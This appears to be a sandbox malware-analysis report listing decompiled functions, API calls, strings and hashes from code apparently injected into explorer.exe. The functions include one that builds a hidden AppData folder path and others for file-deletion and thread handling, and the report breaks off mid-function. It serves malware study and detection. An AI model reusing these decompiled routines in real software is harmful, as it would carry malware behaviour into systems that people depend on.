Instruction ID: 768021aa50df13f097390ac8b90ded0b1acb515ff57bde3cf347a1b24562f573
Opcode Fuzzy Hash: 6ee9ba11fcc8dccdd3bdd938b4077f1c3f9a9ab4f7d6bf45543c7100e311457b
Instruction Fuzzy Hash: C1314EB6E00219AFDF11DBE4DD85EDEB7BCFF55204F0004A6E601EB540E675AB488BA1

Uniqueness

Uniqueness Score: 100.00%

Function 003FACC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88UNIQUE

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 003FAD0B
memset.MSVCRT(?,00000000,00000128), ref: 003FAD3B
StrStrIA.SHLWAPI(?,00000000), ref: 003FADC0
CloseHandle.KERNEL32(000000FF), ref: 003FAE2B

Strings

P, xrefs: 003FACFB

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseCurrentHandleProcessmemset
String ID: P
API String ID: 74355004-3110715001
Opcode ID: 35c2b6b9e12b28ffb01df9ce5878b1608dd42501640dda350694f5e03f9a180b
Instruction ID: eed9668dc492288a9602be8c23884620913ac597b9531772cb049a6ec4692ce2
Opcode Fuzzy Hash: 35c2b6b9e12b28ffb01df9ce5878b1608dd42501640dda350694f5e03f9a180b
Instruction Fuzzy Hash: 2E315DB190061C9BDB35DF60DC58BFEB7B8AB09305F0045E8E60EA6690DB349E95CF52

Uniqueness

Uniqueness Score: 100.00%

Function 003FAFB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87UNIQUE

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 003FAFEE
memset.MSVCRT(?,00000000,00000224), ref: 003FB018
StrStrIA.SHLWAPI(?,00000000), ref: 003FB09A
CloseHandle.KERNEL32(000000FF), ref: 003FB0FF

Strings

m!, xrefs: 003FAFDE

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseCurrentHandleProcessmemset
String ID: m!
API String ID: 74355004-3722647371
Opcode ID: a09598c2f222a58fc708e00af5f603b9302ae45854dec51e4e25365b2d09d793
Instruction ID: 86870eaba31d64d85893aa23a93e6e94ca5e99c349257f37a1ad28d4cdcac8c1
Opcode Fuzzy Hash: a09598c2f222a58fc708e00af5f603b9302ae45854dec51e4e25365b2d09d793
Instruction Fuzzy Hash: 9C312AB190121DDBDB21EF60DE8CBBEB778EB04304F1445E8E619A6180DB799B84CF51

Uniqueness

Uniqueness Score: 100.00%

Function 0151BD40, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73
UNIQUE

Download Yara Rule

C-Code - Quality: 58%

			E0151BD40(intOrPtr* _a4) {
				int _v8;
				int _v12;
				void _v530;
				short _v532;
				WCHAR* _v536;
				short _t24;
				int _t26;
				WCHAR* _t28;
				void* _t47;
				void* _t49;
				void* _t50;

				_v12 = 0;
				_v8 = 0;
				_t24 =  *0x152a6e0; // 0x0
				_v532 = _t24;
				memset( &_v530, 0, 0x206);
				_v536 = 0;
				_t26 = E01513960( &_v530, 0x10);
				_t49 = _t47 + 0x10;
				_v8 = _t26;
				if(_v8 == 0) {
					L10:
					return _v8;
				}
				_t28 = E01515230( &_v530, 0x264d);
				_t50 = _t49 + 4;
				_v536 = _t28;
				if(_v536 == 0) {
					L6:
					while(0 != 0) {
					}
					 *_v8 = E01516C90("C:\Users\Luke");
					 *((intOrPtr*)(_v8 + 4)) = E01516C90( &_v532);
					 *((intOrPtr*)(_v8 + 8)) = E01516C90("C:\Users\Luke\AppData\Local\Temp");
					 *((intOrPtr*)(_v8 + 0xc)) = E01516C90("C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown");
					if(_a4 != 0) {
						 *_a4 = 4;
					}
					goto L10;
				}
				if(GetEnvironmentVariableW(_v536,  &_v532, 0x207) != 0) {
					L5:
					E01515460( &_v536);
					_t50 = _t50 + 4;
					goto L6;
				}
				while(0 != 0) {
				}
				goto L5;
			}

0x0151bd49
0x0151bd50
0x0151bd57
0x0151bd5d
0x0151bd72
0x0151bd7a
0x0151bd86
0x0151bd8b
0x0151bd8e
0x0151bd95
0x0151be4b
0x0151be51
0x0151be51
0x0151bda0
0x0151bda5
0x0151bda8
0x0151bdb5
0x00000000
0x0151bde9
0x0151bded
0x0151bdff
0x0151be13
0x0151be26
0x0151be39
0x0151be40
0x0151be45
0x0151be45
0x00000000
0x0151be40
0x0151bdd2
0x0151bdda
0x0151bde1
0x0151bde6
0x00000000
0x0151bde6
0x0151bdd4
0x0151bdd8
0x00000000

APIs

memset.MSVCRT(?,00000000,00000206), ref: 0151BD72

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

GetEnvironmentVariableW.KERNEL32(00000000,?,00000207), ref: 0151BDCA

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0151BE16
C:\Users\user, xrefs: 0151BDEF
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown, xrefs: 0151BE29

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AllocEnvironmentHeapVariablememset
String ID: C:\Users\user$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown
API String ID: 1183876824-179058661
Opcode ID: be5f6fa61cc117291dda7f729f3ccb925a432473aa35a9e3dbd8b32f4c1b16f4
Instruction ID: bda7b52cef57b679f00debadec2fa57a2d514ca8d3c0d122c11a0fd6a2c64c7a
Opcode Fuzzy Hash: be5f6fa61cc117291dda7f729f3ccb925a432473aa35a9e3dbd8b32f4c1b16f4
Instruction Fuzzy Hash: 3B21A2F9D40209DBFB15EF60D849BDDB770BB94304F1444A8D9099F284E7B16B84CB92

Uniqueness

Uniqueness Score: 100.00%

Function 003F21B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60libraryloaderUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 003F21E5
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 003F2208
FreeLibrary.KERNEL32(00000000), ref: 003F2264

Strings

user32.dll, xrefs: 003F21E0
ChangeWindowMessageFilter, xrefs: 003F21FF

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 145871493-2498399450
Opcode ID: 5b20497b1ed1cb71b3adb998095a0a5a08e4e4b870824a9638461ce964a6f462
Instruction ID: 79ee958038d70644fe5f09895fadd473788aa10fb1fd6354ca38f7041a376fe6
Opcode Fuzzy Hash: 5b20497b1ed1cb71b3adb998095a0a5a08e4e4b870824a9638461ce964a6f462
Instruction Fuzzy Hash: A9218C70D0420CEFDF51DFA0C8097BFBAB4BF48304F218A69D622A66C0C7B84A45EB55

Uniqueness

Uniqueness Score: 100.00%

Function 015140E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryloaderUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(msvcrt.dll), ref: 015140F2
GetProcAddress.KERNEL32(00000000,strtoul), ref: 01514114
FreeLibrary.KERNEL32(?), ref: 01514144

Strings

msvcrt.dll, xrefs: 015140ED
strtoul, xrefs: 0151410B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: msvcrt.dll$strtoul
API String ID: 145871493-2292970490
Opcode ID: faf987b829e4e54a6e34b48eaf07f5ed0ce093ac4ec47ec1e70889226e90c0ff
Instruction ID: 6e99e98129577b75a38e013e4dab83f90470afbbeb7db784daceff2f5035e41b
Opcode Fuzzy Hash: faf987b829e4e54a6e34b48eaf07f5ed0ce093ac4ec47ec1e70889226e90c0ff
Instruction Fuzzy Hash: E9016D75F40208EFEB11DFE8D848AAD7BF4BB59301F209958E816DB248D73496448B50

Uniqueness

Uniqueness Score: 100.00%

Function 003F77F0, Relevance: 7.7, APIs: 5, Instructions: 182memoryUNIQUE

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000014), ref: 003F7968
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 003F7985
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003F79A3
LocalFree.KERNEL32(?), ref: 003F7A04
LocalFree.KERNEL32(?), ref: 003F7A14

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Local$DescriptorFreeSecurity$AllocDaclInitialize
String ID:
API String ID: 1614328241-0
Opcode ID: 0840324811c9b66d1ff0d407cd4f6bd96770c35068eb882ec45f813bbaada66b
Instruction ID: 3cc6c5806127f679d6696fc60ee41c0baf724c68239e00aa183293b52a87e299
Opcode Fuzzy Hash: 0840324811c9b66d1ff0d407cd4f6bd96770c35068eb882ec45f813bbaada66b
Instruction Fuzzy Hash: 94615770A0834CDBEF12CBE0C949BFFBBB9AB04304F148129E205AB690D7B55A45CB55

Uniqueness

Uniqueness Score: 100.00%

Function 00400510, Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00400510(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				signed int _t40;
				signed int _t41;
				WCHAR* _t49;
				intOrPtr _t51;
				void* _t61;
				void* _t65;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t89;
				void* _t90;

				_t65 = __ecx;
				_v20 = 0;
				_v12 = 0;
				while(0 != 0) {
				}
				_t40 = E003F3EE0(_t65, 0x2002);
				_t84 = _t83 + 4;
				_v24 = _t40;
				if(_v24 != 0) {
					_t41 = E003F4A90(_a4);
					_t85 = _t84 + 4;
					_v28 = _t41;
					if(_v28 != 0) {
						E00401A20( &_v28, 0x4087f0, L"\\\\");
						_t86 = _t85 + 0xc;
						while(0 != 0) {
						}
						_v8 = E003F7F40(0, 0x365);
						_push(_a8);
						_push(_v28);
						E003F3B30(_v24, 0x1000, _v8, 0x72);
						E003F8170( &_v8);
						_t89 = _t86 + 0x20;
						while(0 != 0) {
						}
						_t49 = E004006D0(0, _v24);
						_t90 = _t89 + 4;
						_v12 = _t49;
						if(_v12 != 0) {
							while(0 != 0) {
							}
							_t69 = _v12;
							_t51 = E00400460(_v12, _v12);
							_t90 = _t90 + 4;
							_v20 = _t51;
							if(_v20 <= 0) {
								L26:
								_v16 = 0;
								while(_v16 < 0x14) {
									if(DeleteFileW(_v12) == 0) {
										while(0 != 0) {
										}
										SleepEx(0x3e8, 1);
										_v16 = _v16 + 1;
										continue;
									}
									break;
								}
								L34:
								E003F3F10( &_v28, 0xfffffffe);
								E003F3F10( &_v12, 0xfffffffe);
								E003F3F10( &_v24, 0x1000);
								return _v20;
							}
							_v16 = 0;
							while(_v16 < 0xc8) {
								_t61 = E003F85A0(_t69, _a8);
								_t90 = _t90 + 4;
								_v32 = _t61;
								if(_v32 == 0) {
									Sleep(0x64);
									_v16 = _v16 + 1;
									continue;
								}
								CloseHandle(_v32);
								Sleep(0x3e8);
								goto L26;
							}
							goto L26;
						}
						_v20 = 0xfffffffe;
						goto L34;
					}
					return _t41 | 0xffffffff;
				}
				while(0 != 0) {
				}
				return _t40 | 0xffffffff;
			}

0x00400510
0x00400516
0x0040051d
0x00400524
0x00400528
0x0040052f
0x00400534
0x00400537
0x0040053e
0x00400552
0x00400557
0x0040055a
0x00400561
0x00400579
0x0040057e
0x00400581
0x00400585
0x00400594
0x0040059a
0x0040059e
0x004005ae
0x004005ba
0x004005bf
0x004005c2
0x004005c6
0x004005cc
0x004005d1
0x004005d4
0x004005db
0x004005e9
0x004005ed
0x004005ef
0x004005f3
0x004005f8
0x004005fb
0x00400602
0x00400655
0x00400655
0x00400667
0x00400679
0x0040067d
0x00400681
0x0040068a
0x00400664
0x00000000
0x00400664
0x00000000
0x0040067b
0x00400692
0x00400698
0x004006a6
0x004006b7
0x00000000
0x004006bf
0x00400604
0x00400616
0x00400623
0x00400628
0x0040062b
0x00400632
0x0040064d
0x00400613
0x00000000
0x00400613
0x00400638
0x00400643
0x00000000
0x00400643
0x00000000
0x00400616
0x004005dd
0x00000000
0x004005dd
0x00000000
0x00400563
0x00400540
0x00400544
0x00000000

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: e9b2ccb8edcb52400c7aabb09cf2a8c8b4fb3cde6bd1c5887c1941e04766f36d
Instruction ID: c1e9ac55ba7b73997e33260d462553071223282fd12e81b6c45d5948f8cf3b1f
Opcode Fuzzy Hash: e9b2ccb8edcb52400c7aabb09cf2a8c8b4fb3cde6bd1c5887c1941e04766f36d
Instruction Fuzzy Hash: E351A4B4D00209EBDF04DBA0DC46BBF7775AB40304F104A3AE6167A2C1EB799655CF5A

Uniqueness

Uniqueness Score: 0.00%

Function 01522E30, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 128
UNIQUE

Download Yara Rule

C-Code - Quality: 25%

			E01522E30(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t28;
				signed int _t29;
				signed int _t33;
				void* _t34;
				int _t48;
				void* _t52;
				void* _t62;
				intOrPtr _t66;
				void* _t67;

				_t66 = _a4;
				 *(_t66 + 0x38) =  *(_t66 + 0x38) + 1;
				if( *(_t66 + 0x38) <= 0x800) {
					_t28 =  *((intOrPtr*)(_t66 + 0x3c));
					__eflags = _t28 - 0x100;
					if(__eflags > 0) {
						_t29 = _t28 - 0x101;
						__eflags = _t29 - 4;
						if(_t29 > 4) {
							goto L23;
						} else {
							switch( *((intOrPtr*)(_t29 * 4 +  &M01522F80))) {
								case 0:
									_t33 = E01521BD0( *(_t66 + 0x40),  *(_t66 + 0x44));
									goto L21;
								case 1:
									__esp = __esp - 8;
									 *__esp =  *((long long*)(__esi + 0x40));
									__eax = E01521C20(__eax);
									__esp = __esp + 8;
									goto L21;
								case 2:
									__eax = E01521C90();
									goto L21;
								case 3:
									__eax = E01521CA0();
									goto L21;
								case 4:
									__eax = E01521CB0();
									goto L21;
							}
						}
					} else {
						if(__eflags == 0) {
							__eflags = _a8 & 0x00000010;
							_t62 =  *(_t66 + 0x40);
							_t48 =  *(_t66 + 0x44);
							if((_a8 & 0x00000010) != 0) {
								L13:
								_t33 = E01521B50(_t62, _t48);
								 *(_t66 + 0x40) = 0;
								 *(_t66 + 0x44) = 0;
								goto L21;
							} else {
								_t34 = memchr(_t62, 0, _t48);
								_t67 = _t67 + 0xc;
								__eflags = _t34;
								if(_t34 == 0) {
									goto L13;
								} else {
									_push("\\u0000 is not allowed without JSON_ALLOW_NUL");
									_push(0xb);
									_push(_a12);
									E01521F10(_t66);
									__eflags = 0;
									return 0;
								}
							}
						} else {
							__eflags = _t28 - 0xffffffff;
							if(_t28 == 0xffffffff) {
								_push("invalid token");
								_push(8);
								_push(_a12);
								E01521F10(_t66);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t28 - 0x5b;
								if(_t28 == 0x5b) {
									_t33 = E01522D70(_t66, _t52, _a12, _a8);
									goto L21;
								} else {
									__eflags = _t28 - 0x7b;
									if(_t28 != 0x7b) {
										L23:
										_push("unexpected token");
										_push(8);
										_push(_a12);
										E01521F10(_t66);
										goto L24;
									} else {
										_t33 = E01522BD0(_t66, _a12, _a8, _a8);
										L21:
										__eflags = _t33;
										if(_t33 == 0) {
											L24:
											__eflags = 0;
											return 0;
										} else {
											_t25 = _t66 + 0x38;
											 *_t25 =  *(_t66 + 0x38) - 1;
											__eflags =  *_t25;
											return _t33;
										}
									}
								}
							}
						}
					}
				} else {
					_push("maximum parsing depth reached");
					_push(2);
					_push(_a12);
					E01521F10(_t66);
					return 0;
				}
			}

0x01522e34
0x01522e37
0x01522e41
0x01522e5b
0x01522e60
0x01522e65
0x01522f10
0x01522f15
0x01522f18
0x00000000
0x01522f1a
0x01522f1a
0x00000000
0x01522f29
0x00000000
0x00000000
0x01522f36
0x01522f39
0x01522f3c
0x01522f41
0x00000000
0x00000000
0x01522f46
0x00000000
0x00000000
0x01522f4d
0x00000000
0x00000000
0x01522f54
0x00000000
0x00000000
0x01522f1a
0x01522e6b
0x01522e6b
0x01522ec6
0x01522eca
0x01522ecd
0x01522ed0
0x01522efc
0x01522efe
0x01522f08
0x01522f0b
0x00000000
0x01522ed2
0x01522ed6
0x01522edb
0x01522ede
0x01522ee0
0x00000000
0x01522ee2
0x01522ee5
0x01522eea
0x01522eec
0x01522eed
0x01522ef7
0x01522efb
0x01522efb
0x01522ee0
0x01522e6d
0x01522e6d
0x01522e70
0x01522eaf
0x01522eb4
0x01522eb6
0x01522eb7
0x01522ec1
0x01522ec5
0x01522e72
0x01522e72
0x01522e75
0x01522e9f
0x00000000
0x01522e77
0x01522e77
0x01522e7a
0x01522f65
0x01522f68
0x01522f6d
0x01522f6f
0x01522f70
0x00000000
0x01522e80
0x01522e89
0x01522f59
0x01522f59
0x01522f5b
0x01522f78
0x01522f7a
0x01522f7e
0x01522f5d
0x01522f5d
0x01522f5d
0x01522f5d
0x01522f64
0x01522f64
0x01522f5b
0x01522e7a
0x01522e75
0x01522e70
0x01522e6b
0x01522e43
0x01522e46
0x01522e4b
0x01522e4d
0x01522e4e
0x01522e5a
0x01522e5a

Strings

invalid token, xrefs: 01522EAF
unexpected token, xrefs: 01522F68
\u0000 is not allowed without JSON_ALLOW_NUL, xrefs: 01522EE5
maximum parsing depth reached, xrefs: 01522E46

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: _snprintf_vsnprintf
String ID: \u0000 is not allowed without JSON_ALLOW_NUL$invalid token$maximum parsing depth reached$unexpected token
API String ID: 3218647137-1401946484
Opcode ID: 7c8f2da42e4270f7bde5d591cb481f98f36d447db98d6e3c5e707d08641dea4c
Instruction ID: 3d238efc9d5712a74d803a5f95e19e1524655cf43845c02ea0d8730211116488
Opcode Fuzzy Hash: 7c8f2da42e4270f7bde5d591cb481f98f36d447db98d6e3c5e707d08641dea4c
Instruction Fuzzy Hash: F5312B7B60072297D724AA68FCC1E7F73A4FBD6665F04082EFA299F5C0D631E41147A1

Uniqueness

Uniqueness Score: 100.00%

Function 0150842A, Relevance: 7.6, APIs: 5, Instructions: 127
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0150842A(void* __ecx, struct _CRITICAL_SECTION* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				void* _v52;
				char _v132;
				void* __edi;
				void* _t57;
				void* _t64;
				void* _t70;
				intOrPtr* _t74;
				long _t76;
				signed int _t82;
				struct _CRITICAL_SECTION* _t84;
				void* _t87;
				signed int _t88;
				void* _t89;
				void* _t90;
				void* _t91;

				_v8 = 0;
				E01513BA0(__ecx,  &_v52, 0, 0x28);
				E01513BA0(__ecx,  &_v132, 0, 0x50);
				_t5 = _a4 + 0x630; // 0x78a12979
				_t74 =  *_t5;
				_t91 = _t90 + 0x18;
				do {
					_t82 = 0;
					_v12 = 0;
					_t87 =  &_v132;
					while(_t74 != 0) {
						if( *(_t89 + _t82 * 4 - 0x30) != 0) {
							L8:
							_t82 = _t82 + 1;
							_t87 = _t87 + 8;
							L9:
							if(_t82 < 0xa) {
								continue;
							}
							break;
						}
						_push(1);
						_push( *((intOrPtr*)(_t74 + 4)));
						if( *((intOrPtr*)(_a4 + 0x620))() == 0) {
							 *_t87 = _a4;
							 *((intOrPtr*)(_t89 + _t82 * 8 - 0x7c)) = _t74;
							_t64 = CreateThread(0, 0, E015081D6, _t87, 0,  &_v12);
							if(_t64 == 0) {
								L21:
								return 1;
							}
							_v8 =  &(_v8->nLength);
							 *(_t89 + _t82 * 4 - 0x30) = _t64;
							_t74 =  *_t74;
							goto L8;
						}
						_t74 =  *_t74;
						goto L9;
					}
					if(_v8 == 0) {
						break;
					}
					_t76 = WaitForMultipleObjects(_v8,  &_v52, 0, 0x112a880);
					if(_t76 < _v8 || _t76 >= 0x80 && _t76 < _v8 - 0xffffff80) {
						_t57 = 0xa;
						E015083F4(_t57, _t76,  &_v52,  &_v132);
						_v8 = _v8 - 1;
					} else {
						if(_t76 != 0x102) {
							goto L21;
						}
						_t88 = 0;
						if(_v8 <= 0) {
							goto L18;
						} else {
							goto L17;
						}
						do {
							L17:
							TerminateThread( *(_t89 + _t88 * 4 - 0x30), 1);
							_t84 = _a4;
							EnterCriticalSection(_t84);
							 *((intOrPtr*)(_t84 + 0x61c))(_t84,  *((intOrPtr*)( *((intOrPtr*)(_t89 + _t88 * 8 - 0x7c)) + 4)), 0, 0, 4);
							_t91 = _t91 + 0x14;
							LeaveCriticalSection(_t84);
							_t70 = 0xa;
							E015083F4(_t70, _t88,  &_v52,  &_v132);
							_v8 = _v8 - 1;
							_t88 = _t88 + 1;
						} while (_t88 < _v8);
					}
					L18:
				} while (_t74 != 0 || _v8 > _t74);
				return 0;
			}

0x0150843f
0x01508442
0x0150844e
0x01508456
0x01508456
0x0150845c
0x0150845f
0x0150845f
0x01508461
0x01508464
0x01508467
0x01508470
0x015084b9
0x015084b9
0x015084ba
0x015084bd
0x015084c0
0x00000000
0x00000000
0x00000000
0x015084c0
0x01508475
0x01508477
0x01508484
0x0150848d
0x0150849e
0x015084a2
0x015084aa
0x0150857d
0x00000000
0x0150857f
0x015084b0
0x015084b3
0x015084b7
0x00000000
0x015084b7
0x01508486
0x00000000
0x01508486
0x015084c6
0x00000000
0x00000000
0x015084e0
0x015084e5
0x01508501
0x01508502
0x01508507
0x0150850c
0x01508512
0x00000000
0x00000000
0x01508514
0x01508519
0x00000000
0x00000000
0x00000000
0x00000000
0x0150851b
0x0150851b
0x01508521
0x01508527
0x0150852b
0x0150853f
0x01508545
0x01508549
0x01508557
0x0150855a
0x0150855f
0x01508562
0x01508563
0x0150851b
0x01508568
0x01508568
0x00000000

APIs

CreateThread.KERNEL32(00000000,00000000,015081D6,?,00000000,0150539F,?,?,0150539F), ref: 015084A2
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,0112A880,?,?,?,?,0150539F), ref: 015084DA
TerminateThread.KERNEL32(?,00000001,?,?,?,?,0150539F), ref: 01508521
EnterCriticalSection.KERNEL32(0150539F,?,?,?,?,0150539F), ref: 0150852B
LeaveCriticalSection.KERNEL32(0150539F), ref: 01508549

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSectionThread$CreateEnterLeaveMultipleObjectsTerminateWait
String ID:
API String ID: 1434699639-0
Opcode ID: 9dd07e1853f54956efc99a10c1b51cbf0ac7dd45bdb5eae2364626ce139fbe99
Instruction ID: 8e2eb66838ea3b91b773c969e036e62bd1a9976bd4f7ab0217d465a8f4598169
Opcode Fuzzy Hash: 9dd07e1853f54956efc99a10c1b51cbf0ac7dd45bdb5eae2364626ce139fbe99
Instruction Fuzzy Hash: 94419C32E00219FBDF22DFE4D985FAE7BB8FF44310F154429EA05AB185D770AA058B95

Uniqueness

Uniqueness Score: 5.06%

Function 0151CA10, Relevance: 7.6, APIs: 5, Instructions: 108
comCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0151CA10(intOrPtr _a4) {
				signed int _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				char _v280;
				char* _t39;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t42;
				intOrPtr* _t44;
				intOrPtr* _t46;
				void* _t57;
				intOrPtr* _t59;
				intOrPtr* _t77;
				signed int _t78;
				signed int _t80;
				void* _t82;

				_v20 = 0;
				_v8 = 0;
				__imp__CoInitialize(0);
				_t39 =  &_v24;
				__imp__CoCreateInstance(0x152f9f0, 0, 1, 0x152f9e0, _t39);
				if(_t39 >= 0) {
					_t40 = _v24;
					_t41 =  *((intOrPtr*)( *_t40 + 0x14))(_t40,  &_v16);
					_t42 = _v24;
					 *((intOrPtr*)( *_t42 + 8))(_t42);
					if(_t41 >= 0) {
						_t44 = _v16;
						_t66 =  *_t44;
						_push( &_v8);
						_push( &_v12);
						_push(0x3e8);
						_push(_t44);
						if( *((intOrPtr*)( *_t44 + 0xc))() >= 0) {
							_t77 = __imp__CoTaskMemFree;
							L7:
							while(_v8 != 0) {
								while(1) {
									E01513BA0(_t66,  &_v280, 0, 0x100);
									E01516E30(_v8,  *((intOrPtr*)(_v12 + _v8 * 4 - 4)),  &_v280, 0x100);
									_t82 = _t82 + 0x18;
									 *_t77( *((intOrPtr*)(_v12 + _v8 * 4 - 4)));
									_t57 = E01516B80( &_v280, _a4);
									_pop(_t66);
									if(_t57 != 0) {
										break;
									}
									_t28 =  &_v8;
									 *_t28 = _v8 - 1;
									if( *_t28 != 0) {
										continue;
									} else {
									}
									L12:
									 *_t77(_v12);
									_t59 = _v16;
									_t66 =  *_t59;
									_push( &_v8);
									_push( &_v12);
									_push(0x3e8);
									_push(_t59);
									if( *((intOrPtr*)( *_t59 + 0xc))() >= 0) {
										goto L7;
									}
									goto L13;
								}
								_v20 = 1;
								goto L12;
							}
						}
						L13:
						_t46 = _v16;
						 *((intOrPtr*)( *_t46 + 8))(_t46);
						_t80 = _v20;
					} else {
						_t80 = 0xfffffffe;
					}
				} else {
					_t80 = _t78 | 0xffffffff;
				}
				__imp__CoUninitialize();
				return _t80;
			}

0x0151ca1e
0x0151ca21
0x0151ca24
0x0151ca2a
0x0151ca3b
0x0151ca43
0x0151ca54
0x0151ca5e
0x0151ca63
0x0151ca69
0x0151ca6e
0x0151ca75
0x0151ca78
0x0151ca7e
0x0151ca82
0x0151ca88
0x0151ca89
0x0151ca8f
0x0151ca95
0x00000000
0x0151caa0
0x0151caa6
0x0151cab0
0x0151cac7
0x0151cad2
0x0151cad9
0x0151cae5
0x0151caeb
0x0151caee
0x00000000
0x00000000
0x0151caf0
0x0151caf0
0x0151caf3
0x00000000
0x00000000
0x0151caf5
0x0151cafe
0x0151cb01
0x0151cb03
0x0151cb06
0x0151cb0b
0x0151cb0f
0x0151cb10
0x0151cb11
0x0151cb17
0x00000000
0x00000000
0x00000000
0x0151cb17
0x0151caf7
0x00000000
0x0151caf7
0x0151caa0
0x0151cb19
0x0151cb19
0x0151cb1f
0x0151cb22
0x0151ca70
0x0151ca72
0x0151ca72
0x0151ca45
0x0151ca45
0x0151ca45
0x0151ca48
0x0151ca53

APIs

CoInitialize.OLE32(00000000), ref: 0151CA24
CoCreateInstance.OLE32(0152F9F0,00000000,00000001,0152F9E0,?), ref: 0151CA3B
CoUninitialize.OLE32 ref: 0151CA48
CoTaskMemFree.OLE32(00000000), ref: 0151CAD9
CoTaskMemFree.OLE32(?), ref: 0151CB01

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FreeTask$CreateInitializeInstanceUninitialize
String ID:
API String ID: 2797917796-0
Opcode ID: 1315a89b46d7646dc4d8e6ae87859b102734ea03d8dc86edd6626b5145c25c53
Instruction ID: cefd1650e72886e4089cb6e8790900147e873e4179abe7df9d941b33d1c072f4
Opcode Fuzzy Hash: 1315a89b46d7646dc4d8e6ae87859b102734ea03d8dc86edd6626b5145c25c53
Instruction Fuzzy Hash: 79316B72A00109AFDB12DFA8CC44EEEB7BDFF89714F104199E911EB254D7B1AA05CB60

Uniqueness

Uniqueness Score: 2.84%

Function 01504C50, Relevance: 7.6, APIs: 5, Instructions: 104
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01504C50(void* __ecx, void* __edi) {
				int _v8;
				char _v12;
				void _v43;
				char _v44;
				short _v108;
				signed int _t23;
				signed int _t26;
				char _t28;
				intOrPtr _t40;
				intOrPtr* _t49;
				intOrPtr* _t50;
				signed int _t60;
				intOrPtr _t62;
				void* _t72;

				_t23 =  *0x1537968; // 0x0
				_v8 = 0;
				_v12 = 0;
				_t26 = E01513960(__ecx, 0x215 + _t23 * 0x214);
				_v8 = _t26;
				if(_t26 != 0) {
					_t62 =  *0x153796c; // 0x0
					 *0x1537980 = _t62;
